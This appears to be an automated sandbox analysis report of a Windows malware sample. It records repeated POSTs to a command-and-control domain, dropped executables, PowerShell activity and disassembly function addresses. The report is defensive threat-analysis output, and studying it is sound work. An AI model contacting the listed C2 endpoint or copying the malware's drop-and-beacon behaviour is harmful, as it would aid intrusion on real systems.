                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1040Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficDNS traffic detected: DNS query: 487997cm.renyash.top
                                Source: unknownHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: powershell.exe, 00000018.00000002.3184176486.0000026E3D402000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2838857557.000001DFD5AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                                Source: powershell.exe, 00000018.00000002.3033324077.0000026E35256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2251897413.000001E9EC8D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3035292117.0000019B3F6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3003208028.000001A2507E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2522595747.000001DFCDB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 00000018.00000002.1887548221.0000026E25409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DCA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F889000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDCB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: agentFont.exe, 00000005.00000002.1729799646.0000000003609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1887548221.0000026E251E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDA91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 00000018.00000002.1887548221.0000026E25409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DCA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F889000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDCB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 0000001F.00000002.2840898058.000001DFD5B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t.com/pk
                                Source: agentFont.exe, 00000026.00000002.2305020580.0000000002B1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                                Source: powershell.exe, 00000018.00000002.1887548221.0000026E251E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDA91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: powershell.exe, 00000018.00000002.3033324077.0000026E35256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2251897413.000001E9EC8D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3035292117.0000019B3F6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3003208028.000001A2507E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2522595747.000001DFCDB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                                System Summary

                                barindex
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EFB8F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8EFB8F0
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Windows\INF\1668b549825c2aJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1A9A00_2_00007FF7B8F1A9A0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1C9A40_2_00007FF7B8F1C9A4
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F12CBC0_2_00007FF7B8F12CBC
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EF5B700_2_00007FF7B8EF5B70
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F03C880_2_00007FF7B8F03C88
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EFEDF80_2_00007FF7B8EFEDF8
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1FFD00_2_00007FF7B8F1FFD0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EFE3D00_2_00007FF7B8EFE3D0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F096B40_2_00007FF7B8F096B4
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F116B80_2_00007FF7B8F116B8
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F046200_2_00007FF7B8F04620
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F018900_2_00007FF7B8F01890
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F0D7F80_2_00007FF7B8F0D7F8
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F34A180_2_00007FF7B8F34A18
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EF1AB40_2_00007FF7B8EF1AB4
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F2E9B40_2_00007FF7B8F2E9B4
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F119CC0_2_00007FF7B8F119CC
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F14C500_2_00007FF7B8F14C50
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F19D040_2_00007FF7B8F19D04
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EFCCE40_2_00007FF7B8EFCCE4
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F0AE800_2_00007FF7B8F0AE80
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F04EE40_2_00007FF7B8F04EE4
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F00E540_2_00007FF7B8F00E54
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EF9E500_2_00007FF7B8EF9E50
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1805C0_2_00007FF7B8F1805C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F27F240_2_00007FF7B8F27F24
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F30FA00_2_00007FF7B8F30FA0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EF70180_2_00007FF7B8EF7018
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F122C40_2_00007FF7B8F122C4
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EF53000_2_00007FF7B8EF5300
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1319C0_2_00007FF7B8F1319C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F281A00_2_00007FF7B8F281A0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1441C0_2_00007FF7B8F1441C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F314700_2_00007FF7B8F31470
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F0B4D40_2_00007FF7B8F0B4D4
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1FFD00_2_00007FF7B8F1FFD0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F186900_2_00007FF7B8F18690
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EF75500_2_00007FF7B8EF7550
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F0C5400_2_00007FF7B8F0C540
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F125600_2_00007FF7B8F12560
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F006880_2_00007FF7B8F00688
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F0A8680_2_00007FF7B8F0A868
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EFB8F00_2_00007FF7B8EFB8F0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F2B7580_2_00007FF7B8F2B758
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F0E76C0_2_00007FF7B8F0E76C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EFC8240_2_00007FF7B8EFC824
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0072848E1_2_0072848E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_007240FE1_2_007240FE
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_007300B71_2_007300B7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_007340881_2_00734088
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_007371531_2_00737153
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_007451C91_2_007451C9
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_007232F71_2_007232F7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_007362CA1_2_007362CA
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_007343BF1_2_007343BF
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0072F4611_2_0072F461
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0074D4401_2_0074D440
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0072C4261_2_0072C426
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_007377EF1_2_007377EF
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0072286B1_2_0072286B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0074D8EE1_2_0074D8EE
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_007519F41_2_007519F4
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0072E9B71_2_0072E9B7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_00736CDC1_2_00736CDC
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_00733E0B1_2_00733E0B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0072EFE21_2_0072EFE2
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_00744F9A1_2_00744F9A
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 5_2_00007FFD9B870D7C5_2_00007FFD9B870D7C
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 5_2_00007FFD9BC312E25_2_00007FFD9BC312E2
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 5_2_00007FFD9BC240155_2_00007FFD9BC24015
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 5_2_00007FFD9BC2631C5_2_00007FFD9BC2631C
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 5_2_00007FFD9BC305065_2_00007FFD9BC30506
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD9B9630E929_2_00007FFD9B9630E9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFD9B9530E931_2_00007FFD9B9530E9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD9B982E1132_2_00007FFD9B982E11
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 38_2_00007FFD9B8B10EC38_2_00007FFD9B8B10EC
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 38_2_00007FFD9B8A0D7C38_2_00007FFD9B8A0D7C
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 38_2_00007FFD9B8D100038_2_00007FFD9B8D1000
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 38_2_00007FFD9B8DCF4038_2_00007FFD9B8DCF40
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 39_2_00007FFD9B8910EC39_2_00007FFD9B8910EC
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 39_2_00007FFD9B880D7C39_2_00007FFD9B880D7C
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 39_2_00007FFD9B8B100039_2_00007FFD9B8B1000
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 39_2_00007FFD9B8BCF4039_2_00007FFD9B8BCF40
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeCode function: 43_2_00007FFD9B8D100043_2_00007FFD9B8D1000
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeCode function: 43_2_00007FFD9B8DCF4043_2_00007FFD9B8DCF40
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeCode function: 43_2_00007FFD9B8A0D7C43_2_00007FFD9B8A0D7C
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeCode function: 44_2_00007FFD9B8910EC44_2_00007FFD9B8910EC
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeCode function: 44_2_00007FFD9B880D7C44_2_00007FFD9B880D7C
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeCode function: 44_2_00007FFD9B8B100044_2_00007FFD9B8B1000
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeCode function: 44_2_00007FFD9B8BCF4044_2_00007FFD9B8BCF40
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AnJfWYZZ.log 1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: String function: 0073EB78 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: String function: 0073F5F0 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: String function: 0073EC50 appears 56 times
                                Source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs QH67JSdZWl.exe
